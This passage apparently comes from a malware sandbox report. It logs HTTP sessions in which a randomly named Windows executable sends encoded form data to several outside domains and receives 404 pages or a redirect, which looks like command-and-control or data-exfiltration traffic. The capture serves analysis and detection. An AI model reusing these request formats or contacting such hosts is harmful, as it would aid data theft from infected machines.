              Data Ascii: 0th4S=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoPBOHI0nVtykTuQTbk0BUqa5wz9zN5M/Rarmx9Ba0NzZ4muOPpvikDGlV7bzC0tCK2imYf3ZZD12NE/R8bcdbzerFjba1fctRC9CADekO45BvS0/+h6GR2JoPJwg2uAEBG7LwXy4QAEm2QvUXygAYgv+e/qpvVEx2W9AfklD5W/jKcCk4WRbYd6qkIYV6+iXO/k7ZQ7+85PB+faC5FhYCHvabyN4Dq2tHidCT1YEkPTApS1dK8xnTu5mtQNtoskBWtloS0Ji2TYtBL59RyTnNtC23vXs1FOc23gZAK52Jc1qb3kJyilVA4FesZRuF48UThXyl6t4Dz/xf9rJ5xn5c37e2gJl3OY7dubUM0dTgS9gQUyVnKfbvhqglaFOYJRwJYKfGFT+TKaOB1oiXovEu2ZAimRwR9w/QH3qiDEY7LiujngOB5n0S8M+JW+obXybr/eqjXMX0oUVGD0TwDg0Cvj04YhzNfpOsP2ZBkkVQJz4Q2dxMzqJXl05nhEHYGdgdK9yVfWT2tark3nGmJsT2gPkpThkWh5uZyzzekOGb5mT4NrguLD0ITqx9Xce6Unht2GKlOYOoUpoGatkVuimO9G9rd2dsYC6ydvrF0tvNGA/mCpMMuhOKxWlJNnpvbpXk+i9IfnnYTSqtm5ZsFtcSuMEbJM/98PKXlVtnsNAL5a4P6wiqKIzn9YjnHwSRuFxhYL5VsIkN8qP25X/wr9P/NynrSLXCNyzAT9gNJhktO3BcMM/cR2Qj84dsEQm7aMUKT78IbJUYiq2a0OZ8cCgUc5jjaQm1VSeqOGyk/rGpVJ9OO0wtil+oqgcVTZRBdjmk2lFT [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.11497183.33.130.190806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:56:54.472786903 CEST545OUTGET /7xi5/?0th4S=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELEy/+PxLvoGKvuptF2gwKAdd6oJOxHosfWX4=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:56:54.979166031 CEST395INHTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 22 Sep 2024 15:56:54 GMT
              Content-Type: text/html
              Content-Length: 255
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 74 68 34 53 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 2b 52 5a 38 4a 75 61 5a 44 59 2f 2f 51 56 47 6f 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 45 79 2f 2b 50 78 4c 76 6f 47 4b 76 75 70 74 46 32 67 77 4b 41 64 64 36 6f 4a 4f 78 48 6f 73 66 57 58 34 3d 26 75 32 70 6c 3d 56 76 6d 50 32 78 46 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0th4S=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELEy/+PxLvoGKvuptF2gwKAdd6oJOxHosfWX4=&u2pl=VvmP2xFp"}</script></head></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.1149719172.191.244.62806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:00.777945995 CEST806OUTPOST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 62 51 6c 2b 5a 56 79 74 6e 65 79 6f 68 58 41 73 70 51 2b 70 63 46 31 53 73 59 78 69 6e 77 6b 34 4d 51 3d 3d
              Data Ascii: 0th4S=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAbQl+ZVytneyohXAspQ+pcF1SsYxinwk4MQ==
              Sep 22, 2024 17:57:01.233937025 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:57:01 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.1149720172.191.244.62806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:03.318303108 CEST826OUTPOST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 39 51 34 2b 51 53 75 42 42 78 58 65 54 50 6c 75 44 38 6b 75 4b 4e 57 56 6d 31 39 61 4c 57 69 32 67 3d
              Data Ascii: 0th4S=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fW9Q4+QSuBBxXeTPluD8kuKNWVm19aLWi2g=
              Sep 22, 2024 17:57:03.776998043 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:57:03 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.1149721172.191.244.62806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:05.868606091 CEST1839OUTPOST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 71 6b 38 33 6b 79 67 67 58 79 64 77 35 6b 74 50 38 42 6c 42 78 58 53 2b 7a 4c 74 73 2f 77 38 2b 47 74 53 46 44 72 67 70 47 63 30 52 74 45 50 43 4a 76 34 4a 44 41 50 34 73 56 32 6f 53 37 47 68 61 59 68 77 34 61 44 53 4f 53 6f 44 4f 44 57 34 36 73 31 49 30 6d 52 4d 53 35 33 63 6a 69 33 63 67 62 46 34 57 43 36 69 67 4b 58 4c 59 76 4f 65 4f 30 56 59 58 74 36 30 53 79 57 67 2b 67 48 68 43 4f 2b 77 34 31 41 45 2b 2f 30 4a 64 6b 6d 75 7a 48 6e 67 31 57 69 74 7a 63 72 39 72 51 2f 7a 59 56 [TRUNCATED]
              Data Ascii: 0th4S=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcqk83kyggXydw5ktP8BlBxXS+zLts/w8+GtSFDrgpGc0RtEPCJv4JDAP4sV2oS7GhaYhw4aDSOSoDODW46s1I0mRMS53cji3cgbF4WC6igKXLYvOeO0VYXt60SyWg+gHhCO+w41AE+/0JdkmuzHng1Witzcr9rQ/zYVBNHBaOWphyr1CjjrfhMdNdOZtvLdPnxiIOCWifVdAS+9avR69PrpiP3og+/C3eOixHriMiJa3B6X/I/hPYIJxfqKkXTdxzeEUqeZW64gL+50sdQBBKTIvXpWMNuj2XpfyLS8oWtStL7U+6D42sFXOvRyGI4uR2rk5FBT8vl4Zbkfet+bCUwmvLp1v0jIsNPND8oEP5IzXtwCNCxNF41FBf08+VETtyO80xxmdLpVkJ1jfT06rTeAYyI3+5tTmnuQSsMzVjHQbzUzW9WGplxMFBlrjkfXAWdNrZL6fm6M+lEYd3cF0w/kCxjsgz9SEjyD4YWW8jdi3nEYCJ4w5ILUesyGj9mTkTHlSRSQ9iZrJLJ8iEzygbR0sbtJhOLvT4GGIcqBwfk0u4mjGLp8yT006PsPqT1lUnNmF0xrj7QrQofNC9f4b+O6xCyd0Mhvs59RBAZV2y/To1Cn+VMZHpU6bbs00GOsTDyGxwrK9Hqm0RVXEQB/UPz2N/bSIMcdPrPUMjDle8WhcHJ3W25i+fVo58y3b/0cjPWBw6FwXJTMFd3LQ15EawqGiYLAZm0jqgRx17igNcLfnSptI2WSF8y8kO4ljFd9ZDR7qlzwmBp+0JVKQ/+ildeQIegZCBniIolozDtGyQ58HtikdYD1BJB6rBGE9prOj9RgmH [TRUNCATED]
              Sep 22, 2024 17:57:06.378089905 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:57:06 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.1149722172.191.244.62806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:08.417491913 CEST545OUTGET /fpzw/?u2pl=VvmP2xFp&0th4S=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV15vzCfsX7PVMYIeNh7VIWv397Pk5GDHjjKk= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:57:08.880345106 CEST195INHTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:57:08 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.1149723172.96.191.39806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:14.189800024 CEST815OUTPOST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 56 61 30 6a 5a 45 34 6d 73 4e 4e 35 2b 6b 65 6e 61 7a 73 5a 39 69 72 61 4d 64 6b 2b 30 2b 43 56 5a 77 3d 3d
              Data Ascii: 0th4S=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeVa0jZE4msNN5+kenazsZ9iraMdk+0+CVZw==
              Sep 22, 2024 17:57:15.083090067 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:57:14 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.1149724172.96.191.39806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:16.743340015 CEST835OUTPOST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 6a 59 59 37 46 4f 39 50 6e 63 43 7a 34 74 7a 4b 70 57 71 68 68 57 6c 48 38 45 72 42 4f 42 34 66 49 3d
              Data Ascii: 0th4S=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+xjYY7FO9PncCz4tzKpWqhhWlH8ErBOB4fI=
              Sep 22, 2024 17:57:17.653750896 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:57:17 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.1149725172.96.191.39806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:19.297406912 CEST1848OUTPOST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 42 39 78 6c 4b 4c 50 68 52 44 6a 78 54 43 45 59 46 61 31 4f 58 63 4c 51 77 68 77 4c 70 4c 78 6e 39 37 6d 43 46 31 79 43 43 58 6a 4b 62 4c 61 57 52 4a 6b 50 52 36 77 7a 58 52 77 6f 48 4d 52 41 65 65 30 4b 4b 65 58 76 61 39 7a 53 43 30 63 44 38 56 65 79 6a 6e 35 4d 70 4c 50 62 61 52 74 34 63 5a 39 34 6d 2b 56 6a 53 74 4c 46 7a 6c 6d 50 75 61 6e 6e 52 59 62 2f 67 6d 39 4a 57 2f 4c 5a 49 6a 65 6b 4d 43 63 51 75 5a 41 48 39 6a 76 58 69 33 30 58 4a 2b 64 59 4d 69 6d 4c 38 69 58 6f 6c 77 [TRUNCATED]
